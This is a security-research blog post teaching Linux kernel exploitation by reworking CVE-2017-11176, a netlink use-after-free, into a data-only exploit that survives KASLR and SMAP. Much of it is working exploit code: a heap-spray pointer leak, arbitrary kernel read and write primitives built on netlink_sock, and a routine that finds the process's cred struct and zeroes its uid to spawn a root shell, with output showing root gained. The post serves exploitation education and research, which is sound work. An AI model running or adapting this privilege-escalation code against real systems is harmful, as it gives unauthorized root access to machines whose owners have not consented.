Revisiting CVE-2017-11176

In this post we are deviating a bit from the typical format of posts on our blog and try to provide some introductory material into Android/Linux kernel exploitation.

Posted on Apr 17, 2023 | Author: Nils Ole Timm

In this post we are deviating a bit from the typical format of posts on our blog and try to provide some introductory material into Android/Linux kernel exploitation.

Instead of starting from zero, we’ll base this post on Nicolas Fabretti’s excellent series of blogposts about CVE-2017-11176. We are assuming that you’ve read at least up to part 3 of the original blog posts;
so If you have trouble following along, we suggest revisiting the original series.

We will aim to exploit the same issue, but without any of the simplifying assumptions made in the original blog posts. In particular, we deviate from the control flow takeover exploit strategy used by Nicolas and instead implement a different, data-only, exploit strategy, which is still viable with KASLR and SMAP enabled.

With this post we hope that we can help people, who already have an understanding of the basics, take their next step towards more modern exploit strategies.

Background

So, why is control flow takeover not really viable anymore?

To be honest, that’s a bit of a lie. You can still do control flow takeover (unless the system is specifically hardened against it), it’s just a lot harder with KASLR and almost impossible with CFI (Control flow integrity), but the latter isn’t (yet) commonly deployed.

It feels a bit like learning how to do stack based buffer overflows with shell code, right before the introduction of NX/DEP.

So what changes?

Firstly I didn’t want to assume that KASLR (Kernel Address Space Layout Randomisation) is off.
In the blog posts, nokalsr is added to the boot commandline to enforce the assumption. Ironically enough, the 3.16 debian image recommended in the blog post doesn’t even support KASLR, so even without the option it won’t be running with KASLR.
I will still avoid hardcoding absolute addresses in my exploit, so really I’ll be playing pretend that KASLR is on.

Secondly, the blog post assumes that SMAP (Supervisor Mode Access Prevention) is off.
Again the nosmap option is added to the boot commandline.
This prevents the kernel from accessing data in user mode memory, except through copy_from_user and copy_to_user.

Effectively this means that any data structures we want the kernel to use will actually need to be created or transfered to kernel memory somehow.

Lastly, in the blog post the netlink_sock structure ends up in the kmalloc-1024 cache, but in the 3.16 kernel of the VM he recommends in the post, the structure is unfortunately 1088 bytes. This means that, in practice, we will have to cause an allocation of at least 1025 bytes to end up in the correct cache and subsequently overwrite almost all of the original netlink_sock structure.

Where do we deviate?

I personally deviated from the blog post series somewhere in the third part.

It’s hard to say where exactly, because there is a lot of analysis there which is still necessary and helpful even if you follow a different exploit strategy.

What I will call the point of deviation here is the Exploit (Reallocation) section in the third part.
The blog post uses sendmsg to cause controlled kernel allocations.

I’ve opted to use msg_msg or more specifically msg_msgseg structs instead. Here is an excellent blog post by Vitaly Nikolenko describing the primitive, although he ultimately proposes a better (but more complicated) one.
The primitive allows us to control all but the first 8 bytes of an allocation.

Since my goal is to perform a data only exploit you might think that my first goal will be to find primitives for arbitrary read or arbitrary write in kernel memory. But since I’m assuming that KASLR is on, even with such a primitive, I wouldn’t know where I want to read or write, so the first goal should be to find an address leak of any kind.

Finding a leak

We know from the original series of blog posts that the kernel uses the SLAB slab allocator, which makes it very easy to deterministically put a controlled msg_msgseg into the memory of the netlink_sock struct.

It’s very easy to trick yourself (like I did) and only think about how you can use the type confusion to mess with the netlink_sock by altering the msg_msgseg. But in this case if we can get the kernel to set a pointer in the netlink_sock struct and then read it back as a msg we can read out that pointer.

As a sidenote: it took me a few hours to come up with this leak, even if it might seem like an obvious thing when you just read the blog post.

So, let’s take another look at netlink_setsockopt. Nicolas goes through it relatively thoroughly in part 2 of his series, but does it all in the context of unblocking the socket.
But this time we’re looking at it under a different premise, namely some way to obtain a kernel address. Since the netlink_sock struct is 1088 bytes in this kernel, we unfortunately have to overwrite almost the entirety of the struct to end up in the right slab cache, otherwise we might have been able to read pre-existing data. This means that we probably need something to update a pointer for us.

In the code below we can (and also unfortunately must) fully control the data nlk points to.

static int netlink_setsockopt(struct socket *sock, int level, int optname,
                  char __user *optval, unsigned int optlen)
{
    struct sock *sk = sock->sk;
    struct netlink_sock *nlk = nlk_sk(sk);
    unsigned int val = 0;
    int err;
 
    if (level != SOL_NETLINK)
        return -ENOPROTOOPT;
 
    if (optname != NETLINK_RX_RING && optname != NETLINK_TX_RING &&
        optlen >= sizeof(int) &&
        get_user(val, (unsigned int __user *)optval))
        return -EFAULT;
 
    switch (optname) {
    case NETLINK_PKTINFO:
        if (val)
            nlk->flags |= NETLINK_RECV_PKTINFO;
        else
            nlk->flags &= ~NETLINK_RECV_PKTINFO;
        err = 0;
        break;
    case NETLINK_ADD_MEMBERSHIP:
    case NETLINK_DROP_MEMBERSHIP: {
        if (!netlink_allowed(sock, NL_CFG_F_NONROOT_RECV))
            return -EPERM;
        err = netlink_realloc_groups(sk);
        if (err)
            return err;
        if (!val || val - 1 >= nlk->ngroups)
            return -EINVAL;
        if (optname == NETLINK_ADD_MEMBERSHIP && nlk->netlink_bind) {
            err = nlk->netlink_bind(val);
            if (err)
                return err;
        }
        netlink_table_grab();
        netlink_update_socket_mc(nlk, val,
                     optname == NETLINK_ADD_MEMBERSHIP);
        netlink_table_ungrab();
        if (optname == NETLINK_DROP_MEMBERSHIP && nlk->netlink_unbind)
            nlk->netlink_unbind(val);
 
        err = 0;
        break;
    }
    [...]

You’ve probably noticed netlink_realloc_groups on line 29. For now, let’s just assume that it does what it says on the tin and will assign a freshly allocated pointer to nlk->groups.
So we can definitely go into that code path by passing SOL_NETLINK and NETLINK_DROP_MEMBERSHIP.
Under that assumption, there is at least one more potential obstacle, namely the netlink_allowed check.

static inline int netlink_allowed(const struct socket *sock, unsigned int flag)
{
    return (nl_table[sock->sk->sk_protocol].flags & flag) ||
        ns_capable(sock_net(sock->sk)->user_ns, CAP_NET_ADMIN);
}

Luckily, the check operates on a protocol level first. And since we fully control the sk_protocol value, we can set whatever protocol we want that has the NL_CFG_F_NONROOT_RECV flag set. (Which turns out to be a good chunk of them, so 0 works too).

This means we can definitely trigger netlink_realloc_groups, even on our corrupted netlink_sock.
Before we jump into the details of that function, note how in lines 32 and 33 of netlink_setsockopt we have a nice and easy way to leave the function early, this allows us not to worry about our corrupted netlink_sock causing a crash somewhere later in the function. We fully control the value of val since it comes from user memory.

Let’s take a closer look at netlink_realloc_groups now.

static int netlink_realloc_groups(struct sock *sk)
{
    struct netlink_sock *nlk = nlk_sk(sk);
    unsigned int groups;
    unsigned long *new_groups;
    int err = 0;
 
    netlink_table_grab();
 
    groups = nl_table[sk->sk_protocol].groups;
    if (!nl_table[sk->sk_protocol].registered) {
        err = -ENOENT;
        goto out_unlock;
    }
 
    if (nlk->ngroups >= groups)
        goto out_unlock;
 
    new_groups = krealloc(nlk->groups, NLGRPSZ(groups), GFP_ATOMIC);
    if (new_groups == NULL) {
        err = -ENOMEM;
        goto out_unlock;
    }
    memset((char *)new_groups + NLGRPSZ(nlk->ngroups), 0,
           NLGRPSZ(groups) - NLGRPSZ(nlk->ngroups));
 
    nlk->groups = new_groups;
    nlk->ngroups = groups;
 out_unlock:
    netlink_table_ungrab();
    return err;
}

There really isn’t too much to to look at here. What’s important to check is that we won’t crash and that we actually assign a value to our corrupted netlink_sock as we are hoping.

The two checks we need to get around are on lines 11 and 16, which is trivial since we fully control sk_protocol and ngroups.

After that the function does exactly what we were hoping. It (re)allocates nlk->groups and assigns the pointer.

Triggering the leak

So our plan is relatively simple.
We allocate a msg_msgseg full of 0 bytes into the memory of the socket.
Then we call setsockopt on the corrupted netlink_sock with SOL_NETLINK and NETLINK_DROP_MEMBERSHIP. The value we supply must be 0 to trigger the early out.
(But really any value will do, since the latter parts of netlink_setsockopt won’t crash anyway, it’s just more effort to verify)
At this point the nlk->groups pointer should have been updated, so if we read out the message we used to spray we can read the pointer that was set.

As mentioned in the beginning, I am using the msg_msgseg primitive. I’ve wrapped it in a controlled_kmalloc function.

void* leak_heap_kptr(int sock_fd)
{
    char buf[8192];
    memset(buf,0, sizeof(buf));
    //Should end up in memory of netlink_sock
    int opt = 0;
    controlled_kmalloc(buf, msg_size);
    if(setsockopt(sock_fd, SOL_NETLINK, NETLINK_DROP_MEMBERSHIP, &opt, sizeof(int))<0)
    {
        if(errno!=EINVAL)
        {
            perror("[-] Drop membership failed:");
            return 0;
        }
    }
    msgrcv(msq_id, buf, msg_size,msg_size,IPC_NOWAIT);
    controlled_kmalloc(buf, msg_size);
    void** pbuf = (void**)buf;
    return pbuf[0x253];
}

Line 7 performs the allocation that sets all the values in the netlink_sock struct.
Line 8 calls setsockopt, so that nlk->groups will be set in our msg.
Line 16 receives the message, so that we can read out what the value of the pointer was.
Line 17 immediately retakes the same memory. This is very important, since we want to minimize the amount of time in which the memory is free. The smaller that timing window is, the less likely it becomes that another process causes an allocation that ends up in that memory which would likely lead to a crash.
(You can circumvent this issue using MSG_COPY in this case, but it muddies the main point a little and depends on a specific kernel compile flag)
Line 19 returns the leaked pointer.

I won’t go into how to work out that offset, since Nicolas does an excellent job in the original series, offering 5 different methods to work it out.

Giving this a try, it turns out that it actually works.

[+] Leaked heap kptr: 0xffff8800da96cf40

Arbitrary Read

So, with a leaked heap pointer we now have a good idea of where we might want to read memory from.
In the blog post Nicolas talks about netlink_getname which handles the getsockname syscall for netlink sockets. He calls it an “uncontrolled read primitive“.
I won’t go into too much detail here, because he already does in the post.

static int netlink_getname(struct socket *sock, struct sockaddr *addr,
               int *addr_len, int peer)
{
    struct sock *sk = sock->sk;
    struct netlink_sock *nlk = nlk_sk(sk);
    DECLARE_SOCKADDR(struct sockaddr_nl *, nladdr, addr);
 
    nladdr->nl_family = AF_NETLINK;
    nladdr->nl_pad = 0;
    *addr_len = sizeof(*nladdr);
 
    if (peer) {
        nladdr->nl_pid = nlk->dst_portid;
        nladdr->nl_groups = netlink_group_mask(nlk->dst_group);
    } else {
        nladdr->nl_pid = nlk->portid;
        nladdr->nl_groups = nlk->groups ? nlk->groups[0] : 0;
    }
    return 0;
}

If you look carefully at line 17, you will notice that the pointer nlk->groups is actually dereferenced if it isn’t zero.

Since we control all of the memory in the netlink_sock struct, we can set nlk->groups to any value, which means if we set it to an arbitrary address we can read 4 bytes from there. This gives us a very neat fully controlled arbitrary read.

In fact, this code path is so resilient, that I am taking very little care in my arbitrary read implementation.

unsigned int arbitrary_read(int sock_fd, void* src)
{
    char buf[8192];
    void** pbuf=(void**)buf;
    int i;
    for(i=0; i<1024; i++)
    {
        pbuf[i] = src;
    }
    //Free only immediately before allocating
    msgrcv(msq_id, dummyBuf, msg_size,msg_size,IPC_NOWAIT);
    controlled_kmalloc(buf, msg_size);
 
    struct sockaddr_nl val;
    socklen_t val_len;
    getsockname(sock_fd, (struct sockaddr*)&val, &val_len);
    return val.nl_groups;
}

Lines 6-9 just fill the whole struct with pointers to the address I want to read.
Line 11 frees the last msg_msg from the queue, to free the memory inside netlink_sock.
Line 12 immediately retakes the memory, again to make the timing window where we can lose the race as small as possible.
Line 16 retrieves the read value by calling getsockname.
Line 17 finally returns val.nl_groups, which will be the value at the address we made nlk->groups point to.

Here you can see the output of the arbitrary read I use later on to dump the credentials before and after changing them.

Read before
00000007 000003e8 000003e8 000003e8 000003e8 000003e8 000003e8 000003e8 
000003e8 00000000 00000000 00000000 00000000 00000000 00000000 00000000 
ffffffff 0000003f 00000000 00000000 14e17d00 ffff8802 00000000 00000000 
00000000 00000000 00000000 00000000 00000000 00000000 db9dbf40 ffff8800

Arbitrary Write

Unfortunately the arbitrary write is significantly more work to get right.
To find potential candidates I looked for other uses of nlk->groups, more specifically assignments to it.

Now there is one place that performs such an assignment, but that’s in netlink_bind, which performs a lot more operations both before and after. So let’s take a look at that.

static int netlink_bind(struct socket *sock, struct sockaddr *addr,
            int addr_len)
{
    struct sock *sk = sock->sk;
    struct net *net = sock_net(sk);
    struct netlink_sock *nlk = nlk_sk(sk);
    struct sockaddr_nl *nladdr = (struct sockaddr_nl *)addr;
    int err;
    long unsigned int groups = nladdr->nl_groups;
 
    if (addr_len < sizeof(struct sockaddr_nl))
        return -EINVAL;
 
    if (nladdr->nl_family != AF_NETLINK)
        return -EINVAL;
 
    /* Only superuser is allowed to listen multicasts */
    if (groups) {
        if (!netlink_allowed(sock, NL_CFG_F_NONROOT_RECV))
            return -EPERM;
        err = netlink_realloc_groups(sk);
        if (err)
            return err;
    }
 
    if (nlk->portid)
        if (nladdr->nl_pid != nlk->portid)
            return -EINVAL;
 
    if (nlk->netlink_bind && groups) {
        int group;
 
        for (group = 0; group < nlk->ngroups; group++) {
            if (!test_bit(group, &groups))
                continue;
            err = nlk->netlink_bind(group);
            if (!err)
                continue;
            netlink_unbind(group, groups, nlk);
            return err;
        }
    }
 
    if (!nlk->portid) {
        err = nladdr->nl_pid ?
            netlink_insert(sk, net, nladdr->nl_pid) :
            netlink_autobind(sock);
        if (err) {
            netlink_unbind(nlk->ngroups, groups, nlk);
            return err;
        }
    }
 
    if (!groups && (nlk->groups == NULL || !(u32)nlk->groups[0]))
        return 0;
 
    netlink_table_grab();
    netlink_update_subscriptions(sk, nlk->subscriptions +
                     hweight32(groups) -
                     hweight32(nlk->groups[0]));
    nlk->groups[0] = (nlk->groups[0] & ~0xffffffffUL) | groups;
    netlink_update_listeners(sk);
    netlink_table_ungrab();
 
    return 0;
}

Again we need to avoid crashes while we try to get to line 61, which would let us write 4 arbitrary bytes to an arbitrary address.
I’ll break the whole function down into parts to make it easier to follow along.

if (addr_len < sizeof(struct sockaddr_nl))
    return -EINVAL;
 
if (nladdr->nl_family != AF_NETLINK)
    return -EINVAL;

Passing the first two checks is trivial – we control both addr_len and nladdr->nl_family directly with our call to bind and they are only compared to constants.

/* Only superuser is allowed to listen multicasts */
if (groups) {
    if (!netlink_allowed(sock, NL_CFG_F_NONROOT_RECV))
        return -EPERM;
    err = netlink_realloc_groups(sk);
    if (err)
        return err;
}

Similar to before, this check can be passed, at least as far as having the correct permissions.
If netlink_realloc_groups actually triggers reallocation, then our fake pointer would actually be overwritten though. For the eventual exploit chain, we only need to write 0s, so this branch won’t ever actually be taken.
But if we want to consider this a truly arbitrary write, we should try to avoid the reallocation.
Luckily we can just set nlk->ngroups to a large value, to make the reallocation logic exit early.

See the following snippet from netlink_realloc_groups.

if (nlk->ngroups >= groups)
    goto out_unlock;

Back to netlink_bind. Next are a few checks related to making sure the binding state is correctly initialized.

if (nlk->portid)
    if (nladdr->nl_pid != nlk->portid)
        return -EINVAL;

We could just set nlk->portid to 0 to avoid this branch. This would however, cause us to go down a less favorable code path later down the line. We fully control both nlk->portid and the requests nladdr->nl_pid, so passing this check is trivial again.

if (nlk->netlink_bind && groups) {
    int group;
 
    for (group = 0; group < nlk->ngroups; group++) {
        if (!test_bit(group, &groups))
            continue;
        err = nlk->netlink_bind(group);
        if (!err)
            continue;
        netlink_unbind(group, groups, nlk);
        return err;
    }
}

We can completely avoid this branch, by setting the function pointer nlk->netlink_bind to 0.

if (!nlk->portid) {
    err = nladdr->nl_pid ?
        netlink_insert(sk, net, nladdr->nl_pid) :
        netlink_autobind(sock);
    if (err) {
        netlink_unbind(nlk->ngroups, groups, nlk);
        return err;
    }
}

This is the branch we want to avoid by not letting nlk->portid be 0. By passing the nladdr->nl_pid != nlk->portid check earlier we can again completely avoid this branch.

if (!groups && (nlk->groups == NULL || !(u32)nlk->groups[0]))
    return 0;

We don’t want to exit here, since it would skip the assignment we are ultimately aiming for.
Fortunately we will only ever take this branch if the value at the address already is what we wanted to write. If groups isn’t 0, we never take this branch, and if groups is 0 then we only take this branch if nlk->groups[0] is also 0.

At this point, there are no more branches in this function, so unless we crash, the arbitrary write will be performed.

netlink_table_grab();
netlink_update_subscriptions(sk, nlk->subscriptions +
                 hweight32(groups) -
                 hweight32(nlk->groups[0]));
nlk->groups[0] = (nlk->groups[0] & ~0xffffffffUL) | groups;

netlink_table_grab only grabs a global lock and is completely independent of both the manipulated netlink_sock struct and our request input. netlink_update_subscriptions takes both the manipulated sock and additional values as inputs, so we need to check that we won’t crash. But that’s the last hurdle before our write is performed.

static void
netlink_update_subscriptions(struct sock *sk, unsigned int subscriptions)
{
    struct netlink_sock *nlk = nlk_sk(sk);
 
    if (nlk->subscriptions && !subscriptions)
        __sk_del_bind_node(sk);
    else if (!nlk->subscriptions && subscriptions)
        sk_add_bind_node(sk, &nl_table[sk->sk_protocol].mc_list);
    nlk->subscriptions = subscriptions;
}

Just from skimming the code, it looks like the conditional branches operate on lists. This would very likely cause crashes, unless we can forge valid forward and back pointers.

Reading the code a little more carefully, we realize that these operations are only performed when either the current or the updated value is 0, but not the other. In practice this means that we can just set nlk->subscriptions to a large value.

The rest of netlink_bind doesn’t really operate at the sock level, so we aren’t at any real risk of crashing.

So, let’s summarize what we need to do to perform an arbitrary write.

Set up correct bind arguments. Speficially AF_NETLINK and sizeof(sockaddr_nl)
Set the requests groups parameter (src_addr.nl_groups) to the desired value.
Set nlk->sk_protocol to a number that passes the netlink_allowed check (for example 9)
Set nlk->groups to the destination address.
Set nlk->ngroups to a large value to avoid reallocation.
Set nlk->portid and src_addr.nl_pid to the same value != 0.
Set nlk->subscriptions to some large value to avoid dangerous code paths in netlink_update_subscriptions.

So here is my code for the arbitrary write.

int arbitrary_write(int sockfd, void* dst, uint32_t val)
{
    memset(&src_addr, 0, sizeof(src_addr));
    //Set up correct request arguments
    src_addr.nl_family = AF_NETLINK;
    src_addr.nl_pid = getpid();
    src_addr.nl_groups = val;
     
    //Offsets worked out from systemtap output
    #define portid_off ((0xffff880200c292b0-0xffff880200c29000)/sizeof(uint64_t*))
    #define groups_off ((0xffff880200c292c8-0xffff880200c29000)/sizeof(uint64_t*))
    #define sk_protocol ((0x138)/sizeof(uint64_t))
 
    char buf[8192];
    //Make anything in nlk 0 unless overwritten here.
    memset(buf,0x0, sizeof(buf));
    //Pretend there's a netlink_struct at correct offset in msg_msg buffer.
    uint64_t* netlink_struct = (void*)buf+4096-48-8;
    //Set up state of nlk, so that we avoid unfortunate code paths.
    netlink_struct[portid_off] = getpid();
    netlink_struct[groups_off-1] = 0x0000000100000001;//subscriptions and ngroups
    netlink_struct[groups_off] = (uint64_t)dst;
    netlink_struct[sk_protocol] = 0x00000900; //Bitfield values. Setting sk_protocol to 9
    //Should end up in memory of netlink_sock
    //Only free immediately before reallocating
    msgrcv(msq_id, dummyBuf, msg_size,msg_size,IPC_NOWAIT);
    controlled_kmalloc(buf, msg_size);
    //Call to netlink_bind to trigger arbitrary write
    if(bind(sockfd, (struct sockaddr*)&src_addr, sizeof(src_addr))<0)
    {
        perror("Write bind");
        return -1;
    }
    return 0;
}

For the read I just filled the whole netlink_sock struct with the src address. But as you can see, such a crude approach wasn’t enough here. I modified the systemtap script from the original blogpost, to print out the address of the fields in the struct, to identify the correct offsets. Here’s an example output:

-={ dump_netlink_sock: 0xffff880200c29000 }=-
- sk = 0xffff880200c29000
- sk->sk_rmem_alloc = 214272
- sk->sk_rcvbuf = 212992
- sk->sk_refcnt = 2
- &nlk->port_id = 0xffff880200c292b0
- &nlk->ngroups = 0xffff880200c292c4
- &nlk->groups = 0xffff880200c292c8
- nlk->state = 0

Other than that I mainly just put the list of requirements to make the write work into code.

Exploit Plan

I’m not going to go into a lot of detail here about the exploit plan. There are a lot of other writeups that explain different methods of going about that. This talk gives a small overview for example.

In short, I’m using prctl to set the comm field in my task struct, so that I can identify it in memory through the arbitrary read. The comm field is immediately preceded by both real_cred and cred.

So, once the comm field is found in memory, we can follow these pointers and overwrite the uids and gids in the creds struct, to become root.

This approach is relatively crude and not particularly reliable, but it’s easy to understand and thus a nice way to demonstrate the concepts in this blog post.

for(i=0;i<SCAN_RANGE; i++)
{
    uint32_t val = arbitrary_read(dupped_netlink_socket_2,heap_kptr+i*4);
    if(val==*(uint32_t*)pattern)
    {
        printf("Found comm candidate at: %p\n", heap_kptr+i*4);
        if(*(((uint32_t*)pattern)+1)!=arbitrary_read(dupped_netlink_socket_2,heap_kptr+i*4+4))
            continue;
        printf("check 2\n");
        if(*(((uint32_t*)pattern)+2)!=arbitrary_read(dupped_netlink_socket_2,heap_kptr+i*4+8))
            continue;
        printf("check 3\n");
        *(uint32_t*)&real_cred = arbitrary_read(dupped_netlink_socket_2,heap_kptr+i*4-4*4);
        *((uint32_t*)&real_cred+1) = arbitrary_read(dupped_netlink_socket_2,heap_kptr+i*4-3*4);
        if(real_cred<(void*)0xffff000000000000)
        {
            real_cred=0;
            continue;
        }
        printf("real_cred: %p\n", real_cred);
        printf("check 4\n");
        *((uint32_t*)&cred) = arbitrary_read(dupped_netlink_socket_2,heap_kptr+i*4-2*4);
        *((uint32_t*)&cred+1) = arbitrary_read(dupped_netlink_socket_2,heap_kptr+i*4-1*4);
        if(cred<(void*)0xffff000000000000)
        {
            real_cred=0;
            cred=0;
            continue;
        }
        printf("cred: %p\n", cred);
        break;
    }
}

This is the code I used to implement this approach in the actual exploit.
You can see that in lines 4, 7 and 10 I’m checking that the first 12 bytes of the comm field are as expected.

If they are, I proceed to read what should be the real_cred and cred pointers and perform a sanity check to see if they are pointing into the kernels address range in lines 15 and 24.

for(i=0;i<0x20; i++)
{
    uint32_t val = arbitrary_read(dupped_netlink_socket_2,cred+i*4);
    if(val==uid)
    {
        arbitrary_write(dupped_netlink_socket_2,cred+i*4,0);
        arbitrary_read(dupped_netlink_socket_2,cred+i*4-4);
    }
}

After that I just step through the cred structs memory and if we find our own uid we replace it by 0 to become root.

msgrcv(msq_id, dummyBuf, msg_size,msg_size,IPC_NOWAIT);
socket(AF_NETLINK,SOCK_DGRAM,NETLINK_USERSOCK);

Finally we perform some “cleanup” by freeing the UAF memory and reallocating a new netlink_sock.
Now if we exit the program or execve the kernel will find data “as expected” when performing cleanup.

Finally, we just print the current uid and if we’re root we execve “/bin/sh“.

printf("getuid: %d\n", getuid());
if(!getuid())
{
    char* argv[]={"/bin/sh", NULL};
    char* envp[] = {NULL};
    execve("/bin/sh",argv, envp);
}
exit(0);

And here’s an example output of a successful run.

firzen@debian:~/exploit-dev$ ./exploit
[C] Hello there General Kenobi
mq_notify: Bad file descriptor
[C] Hello there General Kenobi
mq_notify: Bad file descriptor
[+] Leaked heap kptr: 0xffff8802151b22e0
comm: ZaZtGjuGAeAA
Found comm candidate at: 0xffff8802151e1b60
check 2
check 3
real_cred: 0xffff880216c88b80
check 4
cred: 0xffff880216c88b80
Read before
00000007 000003e8 000003e8 000003e8 000003e8 000003e8 000003e8 000003e8 
000003e8 00000000 00000000 00000000 00000000 00000000 00000000 00000000 
ffffffff 0000003f 00000000 00000000 14e17d00 ffff8802 00000000 00000000 
00000000 00000000 00000000 00000000 00000000 00000000 db9dbf40 ffff8800 
 
Read after
00000007 00000000 00000000 00000000 00000000 00000000 00000000 00000000 
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 
getuid: 0
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),115(bluetooth),1000(firzen)
#

Final Notes

This exploit is not very reliable, mainly because of heap fragmentation in the kernel and because I’m not very cleanly searching through available memory.

It shouldn’t be particularly hard to improve reliability, for example leaked pointers could be used to identify valid regions of memory to search through.

Another issue with reliability is losing the race to control the netlink_sock struct memory, which could at least be detected using MSG_COPY to avoid crashes.

If you are trying this on VirtualBox the VBoxService will race against you here, it might be a good idea to kill or disable it.